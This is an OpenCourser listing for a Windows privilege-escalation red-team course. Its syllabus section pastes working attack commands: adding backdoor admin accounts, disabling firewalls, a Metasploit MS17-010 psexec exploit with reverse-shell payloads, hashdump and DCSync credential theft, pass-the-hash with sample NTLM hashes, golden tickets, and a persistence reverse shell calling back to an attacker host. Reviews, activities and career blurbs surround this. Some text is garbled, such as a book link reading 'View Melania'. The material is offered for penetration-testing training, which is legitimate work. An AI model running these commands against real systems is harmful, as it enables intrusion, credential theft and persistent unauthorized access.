Sorry, this page is no longer available
We may earn an affiliate commission when you visit our partners.
Course image
Security Gurus

The Windows Privilege Escalation Mastery course is a comprehensive and hands-on training program designed for cybersecurity professionals, system administrators, penetration testers, and anyone seeking to enhance their skills in identifying and exploiting privilege escalation vulnerabilities within Windows environments. This immersive course will equip participants with in-depth knowledge and practical techniques to escalate privileges on Windows systems securely and efficiently.

Key Learning Objectives:

Read more

The Windows Privilege Escalation Mastery course is a comprehensive and hands-on training program designed for cybersecurity professionals, system administrators, penetration testers, and anyone seeking to enhance their skills in identifying and exploiting privilege escalation vulnerabilities within Windows environments. This immersive course will equip participants with in-depth knowledge and practical techniques to escalate privileges on Windows systems securely and efficiently.

Key Learning Objectives:

  1. Understanding Windows Privilege Models: Gain insights into Windows privilege models, user permissions, and the underlying mechanisms that govern user access rights.

  2. Exploiting Vulnerabilities: Learn how to identify and exploit common privilege escalation vulnerabilities in Windows, including misconfigurations, weak file permissions, insecure services, and more.

  3. Enumeration Techniques: Master the art of enumerating users, groups, services, and system information to identify potential privilege escalation opportunities.

  4. Kernel Exploits: Explore advanced techniques to escalate privileges through kernel-level exploits, understanding Windows kernel architecture, and bypassing security mechanisms.

  5. Post-Exploitation Strategies: Learn post-exploitation methodologies to maintain persistent access and cover tracks after privilege escalation.

Course Features:

  • Expert Instructors: Learn from seasoned cybersecurity professionals with extensive experience in penetration testing and Windows security.

  • Cutting-Edge Tools: Familiarize yourself with the latest tools and utilities used for Windows privilege escalation.

  • Practical Tips and Best Practices: Get insider tips, tricks, and best practices to conduct privilege escalation assessments effectively and efficiently.

Enroll now

What's inside

Learning objectives

  • Windows local privilege escalation manually
  • Windows local privilege escalation with metasploit
  • How to exploit active directory from windows
  • Windows local privilege escalation with evil-winrm
  • Windows local privilege escalation with empire
  • How to use metasploit to exploit active directory
  • How to use empire to exploit active directory
  • How to use evil-winrm to exploit active directory
  • How to use crackmapexec to exploit active directory
  • Powerview powershell module

Syllabus

Privilege Escalation - Manually
Local User & Group Enumeration

The commands executed can be found here:


Antivirus & Detections
Read more

#change directory to where Jaws is located

cd c:\ad

#Run from CMD:

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

#Manually Search

schtasks /query /fo LIST 2>nul | findstr TaskName

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

schtasks /query /fo LIST /v > C:\Users\student1\Desktop\task.txt

#Edit the file executed by Administrator

net user /add rabakuku Password123

net localgroup administrators rabakuku /add

#reboot

#open cmd

shutdown /r /f

Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.

AMSI

AntiMalware Scan Interface

Windows AMSI is integrated into the following components:

    PowerShell (scripts, interactive use, and dynamic code evaluation)

    PowerShell ISE (Windows PowerShell-IDE)

    Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)

    User Account Control (UAC) (using a different type of AMSI-provider)

    Office365 (JavaScript/VBA)

    Office365 (Documents)

    .Net Framework 4.8 (Scanning for all assemblies)

    Windows Management Instrumentation (WMI)

upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.

  • usage: upload local_path remote_path

download: it is not needed to set local_path if the remote file is in the current directory.

  • usage: download remote_path local_path

services: list all services. No administrator permissions needed.

User Enumeration

Get current username

echo %USERNAME% || whoami

$env:username

List user privilege

whoami /priv

whoami /groups

List all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator

net user admin

net user %USERNAME%

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

Network Enumeration

List all network interfaces, IP, and DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -A

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firewall state and current configuration

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List firewall's blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

sudo apt install powershell-empire

sudo powershell-empire

Listeners

help

uselistener http

info <-  it will display all the options that you can tweak

BindIP to Kali’s IP address

Port to any port number other than 80

execute

net user raba Password123 /add

net localgroup administrators raba /add

net localgroup "Remote Management Users" raba /add

remove old

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Check if it is exploitable:

use exploit/windows/smb/ms17_010_psexec

set rhosts 192.168.1.53

set smbpass Password123

set smbuser student1

set smbdomain pentesting.local

set paylod windows/meterpreter/reverse_tcp

run

/

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

use Auxiliary/gather/Kerberos_enumusers

sysinfo

ps

post/windows/gather/enum_ad_users

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_logged_on_users

post/windows/gather/enum_ad_user_comments

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_domain

post/windows/gather/enum_computers

post/windows/gather/resolve_sid.rb

run post/windows/gather/enum_ad_computers.rb

post/windows/gather/local_admin_search_enum

post/windows/gather/enum_ad_service_principal_names

run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

ipconfig

netstat

route

#Windows Gather Enumerate Domain Admin Tokens (T

post/windows/gather/enum_tokens

post/windows/gather/enum_patches

post/windows/gather/credentials/winscp

#Windows Gather Powershell Environment Setting E

post/windows/gather/enum_powershell_env

post/windows/gather/enum_ie

post/windows/gather/bloodhound

for More

search post/windows/gather/

use post/windows/gather/enum_shares

use post/windows/gather/enum_services

use post/windows/gather/enum_snmp

use post/windows/gather/enum_chrome

use post/windows/gather/enum_av_excluded

use post/windows/gather/enum_putty_saved_sessions

use post/windows/gather/enum_applications

use post/windows/gather/win_privs

use post/windows/gather/forensics/browser_history

for more:

search post/windows/gather/

LOCAL_EXPLOIT_SUGGESTER

run post/multi/recon/local_exploit_suggester

post/windows/gather/win_privs

post/windows/manage/add_user

set addtogroup true

set username test

set group administrators

set session 2

post/windows/manage/delete_user

search hashdump

search credential_collector

post/windows/gather/hashdump

post/windows/gather/credentials/credential_collector

meterpreter > load kiwi

meterpreter > help

Testing Credentials

crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

  • use exploit/windows/smb/psexec

    • set SMBDomain pentesting.local

    • set smbuser ippsec

    • set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe

    • set rhosts 192.168.1.55

    • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

  • use exploit/windows/smb/psexec

    • set SMBDomain pentesting.local

    • set smbuser s4vitar

    • set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71

    • set rhosts 192.168.1.50

    • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

use post/windows/gather/credentials/domain_hashdump

scanner/smb/impacket/secretsdump

In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.

use post/windows/gather/credentials/domain_hashdump

use incognito

list_tokens -u

impersonate_token PENTESTING\\Administrator

From Domain Controller

meterpreter > use incognito

meterpreter > impersonate_token PENTESTING\\Administrator

meterpreter > load kiwi

meterpreter > help

meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'

meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'

use post/windows/escalate/golden_ticket

Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.

The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.

With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).

Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.

kerberos_ticket_list

kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin

After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.

meterpreter > run persistence -h

meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223

meterpreter > exit

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.223

set LPORT 4458

exploit

When a user logs in to the remote system, a Meterpreter session is opened up for us.

Traffic lights

Read about what's good
what should give you pause
and possible dealbreakers
Provides hands-on experience with privilege escalation techniques, which is essential for red team operations and penetration testing engagements
Covers Windows privilege models and user permissions, which helps administrators better understand and manage access rights within their environments
Explores post-exploitation strategies, which enables cybersecurity professionals to maintain persistent access and cover their tracks after privilege escalation
Requires learners to install and use tools such as Metasploit, Evil-WinRM, and Empire, which may require a dedicated lab environment
Teaches enumeration techniques, which are crucial for identifying potential privilege escalation opportunities within Windows systems
Explores kernel exploits, which requires a solid understanding of Windows kernel architecture and security mechanisms

Save this course

Create your own learning path. Save this course to your list so you can find it easily later.
Save

Reviews summary

Windows privilege escalation mastery for red team

According to learners, this course offers a highly practical and hands-on approach to Windows local privilege escalation. Students particularly appreciate the clear explanations of complex concepts and the extensive use of relevant industry tools like Metasploit and Empire. The course is seen as providing actionable techniques that can be immediately applied in real-world red team scenarios. While the demonstrations are highlighted as very helpful, some learners suggest having prior foundational knowledge in Windows basics and Kali Linux is beneficial to get the most out of the material. Overall, it is considered a valuable resource for security professionals looking to deepen their understanding.
Pace of security means content evolves.
"Security is a fast-moving field, so some specific exploits might become <span class="neutral">less relevant over time if not updated."
"While the <span class="neutral">fundamentals are solid, I know I'll need to supplement with newer research as time goes on."
"The course covers <span class="neutral">current techniques, but staying updated in this field requires ongoing learning."
"It provides a <span class="positive">great base, but continuous self-study is essential in cybersecurity."
Techniques applicable in real-world.
"I can immediately apply these <span class="positive">privilege escalation techniques in my penetration tests."
"The course provides <span class="positive">practical, real-world scenarios and methods."
"Learned <span class="positive">actionable steps to identify and exploit vulnerabilities."
"Extremely relevant to my job, the <span class="positive">techniques taught are very effective."
Teaches using key industry tools.
"Loved learning how to use <span class="positive">Metasploit and Empire for privilege escalation; very relevant tools."
"The coverage of <span class="positive">Evil-WinRM and PowerView was particularly useful for my work."
"Using <span class="positive">CrackMapExec and other <span class="positive">red team tools was a highlight of the course."
"Good coverage of the <span class="positive">latest tools and utilities used in the field."
Complex topics are explained clearly.
"The instructor explains complex topics like kernel exploits in a <span class="positive">clear and understandable way."
"I appreciated how the concepts were broken down; everything was very <span class="positive">easy to follow."
"The explanations are <span class="positive">concise and to the point, making it easy to grasp difficult ideas."
"Great job simplifying the material, the <span class="positive">clarity of instruction is a major plus."
Focuses on practical skills and labs.
"The <span class="positive">practical examples and labs were incredibly useful for understanding the concepts."
"This course is extremely <span class="positive">hands-on, which is exactly what I needed to learn these techniques."
"I found the <span class="positive">demos and exercises very effective in showing how to actually perform the privilege escalation steps."
"The <span class="positive">practical approach makes the material stick better than just theory."
Benefits from prior foundational knowledge.
"Might be a bit fast-paced if you don't have some <span class="warning">basic Windows or Kali Linux experience."
"Having a <span class="warning">solid foundation in networking and command line helps tremendously."
"I felt I needed to brush up on some <span class="warning">basics before diving deep into the exploitation techniques."
"Recommended having <span class="warning">some prior pentesting background for the best learning experience."

Activities

Be better prepared before your course. Deepen your understanding during and after it. Supplement your coursework and achieve mastery of the topics covered in Windows Local Privilege Escalation Mastery - Red Team with these activities:
Review Windows Command Line Basics
Solidify your understanding of basic Windows command-line utilities and syntax. This will help you navigate the system, enumerate users and groups, and execute commands during privilege escalation attempts.
Show steps
  • Review common commands like 'net user', 'whoami', 'ipconfig', and 'dir'.
  • Practice using command-line switches and options.
  • Familiarize yourself with command piping and redirection.
Read 'Windows Internals, 7th Edition'
Gain a deeper understanding of the Windows operating system's internal workings. This will help you better understand privilege escalation vulnerabilities and how to exploit them.
View Melania on Amazon
Show steps
  • Focus on chapters related to security, processes, and the kernel.
  • Take notes on key concepts and data structures.
Practice Enumeration on a Virtual Machine
Reinforce enumeration techniques by practicing on a vulnerable Windows virtual machine. This will help you identify potential privilege escalation opportunities.
Show steps
  • Set up a vulnerable Windows VM (e.g., using Metasploitable3).
  • Use various enumeration tools and techniques to gather information about the system.
  • Document your findings and identify potential vulnerabilities.
Four other activities
Expand to see all activities and additional details
Show all seven activities
Document Privilege Escalation Paths
Solidify your understanding of privilege escalation by documenting different escalation paths. This will help you organize your knowledge and identify common patterns.
Show steps
  • Choose a specific privilege escalation technique (e.g., unquoted service paths).
  • Research the technique and identify the steps involved in exploiting it.
  • Create a detailed document outlining the escalation path, including commands, tools, and potential mitigations.
Build a Privilege Escalation Cheat Sheet
Consolidate your knowledge by creating a comprehensive cheat sheet for Windows privilege escalation. This will serve as a valuable reference during penetration tests and security assessments.
Show steps
  • Gather information on various privilege escalation techniques.
  • Organize the information into a clear and concise cheat sheet format.
  • Include commands, tools, and examples for each technique.
  • Regularly update the cheat sheet with new information and techniques.
Read 'Penetration Testing: A Hands-On Introduction to Hacking'
Understand the broader context of penetration testing and how privilege escalation fits into the overall process. This will help you conduct more effective and realistic security assessments.
Show steps
  • Focus on chapters related to Windows exploitation and post-exploitation.
  • Pay attention to the ethical considerations of penetration testing.
Contribute to a Privilege Escalation Tool
Deepen your understanding by contributing to an open-source privilege escalation tool. This will expose you to real-world code and collaboration practices.
Show steps
  • Identify an open-source privilege escalation tool (e.g., PowerUp).
  • Review the tool's code and documentation.
  • Identify a bug or feature that you can contribute.
  • Submit a pull request with your changes.

Career center

Learners who complete Windows Local Privilege Escalation Mastery - Red Team will develop knowledge and skills that may be useful to these careers:
Penetration Tester
A Penetration Tester, sometimes called an ethical hacker, simulates cyberattacks to identify vulnerabilities in systems. This course equips you with the skills to identify and exploit privilege escalation vulnerabilities within Windows environments, a crucial aspect of penetration testing. You'll learn enumeration techniques, kernel exploits, and post-exploitation strategies, all directly applicable to real-world scenarios. The hands-on approach to Windows privilege models, user permissions, and security mechanisms provided here helps build the practical expertise that penetration testers need to assess and improve system security.
Red Team Operator
As a Red Team Operator, your goal is to emulate real-world attackers and assess an organization's security posture. This course immerses you in the techniques needed to escalate privileges on Windows systems, a common objective for attackers. You'll learn about exploiting vulnerabilities, bypassing security mechanisms, and maintaining persistent access, mirroring the tactics used by adversaries. The course's emphasis on practical tips, cutting-edge tools, and best practices sharpens the skills required for effective red team operations, making you capable of identifying and exploiting weaknesses in Windows environments.
Vulnerability Assessor
A Vulnerability Assessor identifies and evaluates security weaknesses in systems and applications. This course is directly relevant to your work, focusing specifically on privilege escalation vulnerabilities within Windows environments. You'll gain practical skills in enumerating users, groups, services, and system information to identify potential escalation opportunities. The knowledge of cutting-edge tools and techniques presented in the course makes vulnerability assessments more thorough and effective, leading to better remediation strategies.
Security Consultant
Security Consultants advise organizations on how to improve their security posture and mitigate risks. This course enhances your expertise in Windows security, specifically in the critical area of privilege escalation. This allows you to provide clients with informed recommendations on how to harden their Windows environments and prevent attackers from gaining unauthorized access to sensitive systems and data. The practical tips, best practices, and in-depth knowledge of Windows privilege models covered in the course make you a more valuable and effective security consultant.
System Administrator
System Administrators are responsible for maintaining and managing computer systems, including user access rights and security configurations. This course provides a concentrated look at Windows privilege models and how vulnerabilities can be exploited to gain elevated access. With this knowledge, a system administrator can better secure their systems by identifying and remediating potential privilege escalation pathways. Understanding common vulnerabilities, misconfigurations, and insecure services, as covered in the course, helps system administrators harden Windows environments against attacks.
Information Security Specialist
An Information Security Specialist focuses on protecting an organization's sensitive data and systems from unauthorized access. This course provides targeted knowledge about Windows privilege escalation, a critical aspect of security. By delving into enumeration techniques, kernel exploits, and post-exploitation strategies you can better assess and mitigate the risks associated with privilege escalation attacks. Understanding Windows privilege models and common vulnerabilities helps you develop and implement security policies and procedures that effectively protect sensitive information.
Security Engineer
A Security Engineer is responsible for designing, implementing, and managing security systems and infrastructure. This course may provide valuable insights into the types of vulnerabilities that can be exploited to escalate privileges on Windows systems. This knowledge enables you to design more secure systems and implement effective preventative measures. The course's focus on identifying misconfigurations, weak file permissions, and insecure services helps you build a robust security architecture that minimizes the risk of privilege escalation attacks.
Cybersecurity Analyst
The role of a Cybersecurity Analyst involves monitoring and protecting computer systems and networks. This course may be useful for understanding how attackers escalate privileges within Windows environments, enabling you to better identify and respond to potential threats. Learning about Windows privilege models, common vulnerabilities, and exploitation techniques provides valuable context for analyzing security incidents and implementing effective security measures. Familiarity with tools like Metasploit and Empire, as covered in the course, enhances your ability to investigate and mitigate security breaches.
Incident Responder
As an Incident Responder, you are responsible for investigating and responding to security incidents. This course may be helpful for understanding how attackers escalate privileges within Windows systems during an attack. Understanding Windows privilege models, common vulnerabilities, and exploitation techniques provides valuable context for analyzing security incidents and containing the damage. Knowledge of post-exploitation strategies, as covered in the course, helps you identify the scope of an intrusion and effectively eradicate the attacker's presence.
Reverse Engineer
Reverse Engineering, often requiring an advanced degree, investigates the inner workings of software and hardware. This course may provide a deeper understanding of how vulnerabilities are exploited at a low-level within the Windows operating system. The insight into kernel exploits, bypassing security mechanisms, and understanding Windows architecture, as presented in the course, provides a solid background for reverse engineering tasks related to security vulnerabilities and malware analysis. This course helps reverse engineers analyze and understand sophisticated attack techniques.
Digital Forensics Analyst
A Digital Forensics Analyst examines digital evidence to investigate security incidents and crimes. This course may be helpful for investigating incidents involving privilege escalation on Windows systems. Learning about privilege models, exploitation techniques, and post-exploitation strategies may improve your ability to reconstruct the attacker's actions, identify compromised accounts, and gather evidence for legal proceedings. Familiarity with the tools and techniques covered in the course aids you in uncovering traces of malicious activity and determining the extent of the breach.
Security Operations Center Analyst
A Security Operations Center Analyst monitors security systems and responds to alerts. This course may prove useful for recognizing and responding to security incidents involving privilege escalation attempts on Windows systems. Understanding Windows privilege models and common vulnerabilities may improve your ability to identify suspicious activity and escalate incidents to the appropriate teams. Familiarity with the tools and techniques covered in the course aids in triaging security alerts and preventing successful privilege escalation attacks.
Application Security Engineer
An Application Security Engineer specializes in securing software applications. This course may be valuable for understanding how vulnerabilities in applications can be exploited to escalate privileges within Windows environments. By learning about common privilege escalation techniques, you can design more secure software and implement effective security controls. This course helps application security engineers build secure applications, even in complex Windows environments.
Cloud Security Engineer
A Cloud Security Engineer focuses on securing cloud-based systems and data. This course may be helpful for understanding how attackers can escalate privileges in cloud-based Windows environments. Learning about Windows privilege models, common vulnerabilities, and exploitation techniques provides valuable insights for securing cloud infrastructure and preventing unauthorized access. Familiarity with the tools and techniques covered in the course enables you to better protect cloud-based resources from privilege escalation attacks.
Security Architect
A Security Architect designs and implements an organization's overall security strategy. This course may be useful for understanding the potential impact of Windows privilege escalation vulnerabilities on the overall security architecture. Knowledge of common exploitation techniques and post-exploitation strategies may help you design a more robust and resilient security architecture that minimizes the risk of privilege escalation attacks. This course helps security architects make informed decisions about security controls and infrastructure investments.

Reading list

We've selected two books that we think will supplement your learning. Use these to develop background knowledge, enrich your coursework, and gain a deeper understanding of the topics covered in Windows Local Privilege Escalation Mastery - Red Team.
Provides a broad overview of penetration testing methodologies, including privilege escalation. It is useful for understanding the context of privilege escalation within a larger security assessment. This book is valuable as additional reading to provide context. It is commonly used as a textbook at academic institutions.

Share

Help others find this course page by sharing it with your friends and followers:

Similar courses

Similar courses are unavailable at this time. Please try again later.
Our mission

OpenCourser helps millions of learners each year. People visit us to learn workspace skills, ace their exams, and nurture their curiosity.

Our extensive catalog contains over 50,000 courses and twice as many books. Browse by search, by topic, or even by career interests. We'll match you to the right resources quickly.

Find this site helpful? Tell a friend about us.

Affiliate disclosure

We're supported by our community of learners. When you purchase or subscribe to courses and programs or purchase books, we may earn a commission from our partners.

Your purchases help us maintain our catalog and keep our servers humming without ads.

Thank you for supporting OpenCourser.

© 2016 - 2025 OpenCourser